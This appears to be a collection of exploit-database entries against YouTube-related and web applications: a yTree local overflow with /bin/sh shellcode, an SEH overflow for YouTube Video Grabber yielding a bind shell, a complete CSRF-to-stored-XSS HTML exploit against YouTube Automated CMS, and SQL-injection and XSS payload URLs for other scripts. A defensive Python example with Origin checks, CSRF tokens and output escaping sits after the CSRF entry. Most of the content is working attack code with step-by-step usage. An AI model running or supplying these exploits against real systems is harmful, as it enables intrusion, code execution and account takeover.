        shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
        nops = "\x90"*1200
        eip = "\xd0\xf6\xff\xbf"
        subprocess.call(["ytree",' ', junk + shellcode + nops + eip])
    except OSError as e:
        if e.errno == errno.ENOENT:
            print "Sorry, yTree not found!"
        else:
            print "Error executing exploit"
            raise

def howtousage():
    print "Snap! Something went wrong"
    sys.exit(-1)

if __name__ == '__main__':
    try:
        print "Exploit yTree v1.94-1.1 Local Overflow Exploit"
        print "Author: Juan Sacco"
    except IndexError:
        howtousage()
    run()
source: https://www.securityfocus.com/bid/54859/info
YT-Videos Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/demo/ytvideos/play.php?id=2'
# Exploit Title: YouTube Video Grabber 1.9.9.1 - Buffer Overflow (SEH)
# Date: 01.11.2021
# Software Link: https://www.litexmedia.com/ytgrabber.exe
# Exploit Author: Achilles
# Tested Version: 1.9.9.1
# Tested on: Windows 7 64bit
# 1.- Run python code : YouTube.py
# 2.- Open EVIL.txt and copy All content to Clipboard
# 3.- Open YouTube Video Grabber and press Enter Code
# 4.- Paste the content of EVIL.txt into the 'Name and Serial Number' field
# 5.- Click 'OK'
# 6.- Connect with nc.exe to the local IP on port 3110 and you will have a bind shell
# 7.- Greetings go:XiDreamzzXi,Metatron
#!/usr/bin/env python
import struct
buffer = "\x41" * 712
nseh = "\xEB\x06\x90\x90" #jmp short 6
seh = struct.pack('<L',0x01c5642e) #pop ecx # pop ecx # ret | {PAGE_EXECUTE_WRITECOPY} [YouTubeGrabber.exe
nops = "\x90" * 20
#msfvenom -p windows/shell_bind_tcp LPORT=3110 -f py -e x86/alpha_mixed EXITFUNC=thread -b "\x00\x0a\x0d\x20"
buf = b""
pad = "B" * (7280 - len(buffer) - len(nseh+seh) - len(nops) - len(buf))
payload = buffer + nseh + seh + nops + buf + pad
try:
    f=open("Evil.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
# Exploit Title: YouTube Automated CMS 1.0.1 / 1.0.7 - CSRF to Persistent XSS
# Date: 14 October 2016
# Exploit Author: Arbin Godar
# Website : ArbinGodar.com
# Software Link: https://codecanyon.net/item/youtube-automated-cms/12021939
# Version: 1.0.1 to 1.0.7
----------------------------------------------------------------------------------------------------------------------
Description:
Attackers are able to execute JavaScript and perform CSRF on web
applications using YouTube Automated CMS, which allows an attacker to
create a post when an authenticated user/admin browses a specially
crafted web page. The whole process was also possible without any
authenticated user/admin; for more info, watch the PoC video below.
The title parameter was not filtering special characters, meaning it is
vulnerable to XSS. So, by creating CSRF exploit code that posts an
article with an XSS alert JS payload as the title of the post, if the
attacker performs the CSRF attack successfully, the XSS will be
triggered whenever someone opens the site using YouTube Automated CMS.
CSRF Exploit Code:
<html>
<body>
<title>[Youtube Automated CMS] CSRF to Persistent XSS</title>
<script>
function submitRequest()
{
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "http://victim.com/admin/videos.php?case=add&youtube_video_url=https://sophosnews.files.wordpress.com/2016/02/anonymous.jpg", true);
  xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
  xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1681718590736");
  xhr.withCredentials = true;
  var body = "-----------------------------1681718590736\r\n" +
    "Content-Disposition: form-data; name=\"title\"\r\n" +
    "\r\n" +
    "\"\x3e\x3cscript\x3ealert(/XSSed-By-Arbin/)\x3c/script\x3e\r\n" +
    "-----------------------------1681718590736\r\n" +
    "Content-Disposition: form-data; name=\"details\"\r\n" +
    "\r\n" +
    "\r\n" +
    "-----------------------------1681718590736\r\n" +
    "Content-Disposition: form-data; name=\"category_id\"\r\n" +
    "\r\n" +
    "1\r\n" +
    "-----------------------------1681718590736\r\n" +
    "Content-Disposition: form-data; name=\"thumbnail\"; filename=\"\"\r\n" +
    "Content-Type: application/octet-stream\r\n" +
    "\r\n" +
    "\r\n" +
    "-----------------------------1681718590736\r\n" +
    "Content-Disposition: form-data; name=\"published\"\r\n" +
    "\r\n" +
    "1\r\n" +
    "-----------------------------1681718590736\r\n" +
    "Content-Disposition: form-data; name=\"duration\"\r\n" +
    "\r\n" +
    "70\r\n" +
    "-----------------------------1681718590736\r\n" +
    "Content-Disposition: form-data; name=\"image\"\r\n" +
    "\r\n" +
    "https://sophosnews.files.wordpress.com/2016/02/anonymous.jpg\r\n" +
    "-----------------------------1681718590736\r\n" +
    "Content-Disposition: form-data; name=\"submit\"\r\n" +
    "\r\n" +
    "\r\n" +
    "-----------------------------1681718590736--\r\n";
  var aBody = new Uint8Array(body.length);
  for (var i = 0; i < aBody.length; i++)
    aBody[i] = body.charCodeAt(i);
  xhr.send(new Blob([aBody]));
}
</script>
<br><br><br>
<center>
  <h2><font color="red">[Youtube Automated CMS] CSRF to Persistent XSS by Arbin</font></h2>
  <form action="#">
    <input type="button" value="Submit request" onclick="submitRequest();" />
  </form>
</center>
</body>
</html>
PoC Video: https://youtu.be/cCtThSquNSk
Vendor Shouted Urgent Update:
http://wpsup.com/products/youtube-automated-cms/urgent-update-1-0-8-fix-security-bugs/
Fix/Patch: Update to latest version.
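As an added defensive example (not the CMS's own code and not the vendor's 1.0.8 fix), this Python shows the two server-side checks whose absence the description above relies on: a request such as videos.php?case=add is accepted only when its Origin (or Referer) is the site's own and when it carries a per-session CSRF token the cross-site page cannot read, and a stored title is escaped when printed so the "><script> payload stays text. SITE_ORIGIN, the header/form/session dicts and the function names are this example's own.

```python
import hmac
import secrets
from html import escape
from urllib.parse import urlsplit

# Constructed deployment value (not the CMS's own configuration): the only
# origin from which admin forms are legitimately submitted.
SITE_ORIGIN = "https://cms.example.com"


def issue_csrf_token(session):
    """Create, once per login session, the secret the admin form embeds as a
    hidden field. The attacker's page cannot read it: the same-origin policy
    keeps it from reading any response from this site."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def _origin_of(url):
    p = urlsplit(url)
    if not p.scheme or not p.netloc:
        return None
    return "%s://%s" % (p.scheme.lower(), p.netloc.lower())


def authorize_state_change(headers, form, session):
    """Gate for a state-changing request such as videos.php?case=add.
    headers: request headers with lower-cased names; form: the decoded
    multipart/form-data fields; session: the server-side session dict.
    Returns (allowed, reason). Marking the session cookie SameSite=Lax
    would additionally keep the browser from attaching it to the cross-site
    POST in the first place."""
    if not session.get("admin_id"):
        return False, "not authenticated"
    # 1. Origin check. The browser sets Origin on the cross-site XHR and
    #    script cannot override it, so it names the attacker's site.
    origin = headers.get("origin")
    if origin is None and headers.get("referer"):
        origin = _origin_of(headers["referer"])
    if origin is None:
        return False, "missing Origin and Referer"
    if origin.lower() != SITE_ORIGIN:
        return False, "cross-site origin %s" % origin
    # 2. Token check, in constant time so the comparison leaks nothing.
    expected = session.get("csrf_token", "")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "bad or missing CSRF token"
    return True, "ok"


def render_title(raw_title):
    """Output-side fix for the second half of the advisory: a stored title is
    printed through escape(quote=True), so '"><script>...' stays text."""
    return escape(raw_title, quote=True)
```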
----------------------------------------------------------------------------------------------------------------------
Regards,
Arbin Godar
https://twitter.com/arbingodar
# # # # #
# Exploit Title: Youtube Analytics Multi Channel v3.0 - SQL Injection
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://vtcreators.com/
# Software Buy: https://codecanyon.net/item/youtube-analytics-multi-channel/14720919
# Demo: http://demo.vtcreators.com/yamc/
# Version: 3.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/index.php/user_management/update?id=[SQL]
# Etc...
# # # # #
source: https://www.securityfocus.com/bid/58399/info
Your Own Classifieds is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/cat-search/for-sales-2/%22%3E%3Cimg%20src=x%20onerror=prompt%280%29;%3E